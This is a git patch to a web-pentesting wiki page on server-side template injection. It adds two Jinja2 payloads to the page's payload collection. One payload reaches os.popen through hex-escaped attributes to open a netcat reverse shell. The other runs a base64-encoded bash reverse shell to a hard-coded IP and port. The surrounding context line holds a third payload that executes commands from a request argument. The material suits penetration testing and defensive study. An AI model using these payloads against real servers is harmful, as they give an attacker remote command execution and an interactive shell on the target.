From 6eff584f5e5ef37e6c2995c1c43cca4f12e746dc Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Mon, 27 Sep 2021 15:01:45 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 .../ssti-server-side-template-injection/README.md          | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 1b0ec103115..84221dc0f66 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -677,6 +677,13 @@ Simply modification of payload to clean up output and facilitate command input \
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 ```
 
+More:
+
+```python
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f')|attr('read')()}}
+{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
+```
+
 **Exploit SSTI without ""**
 
 ```python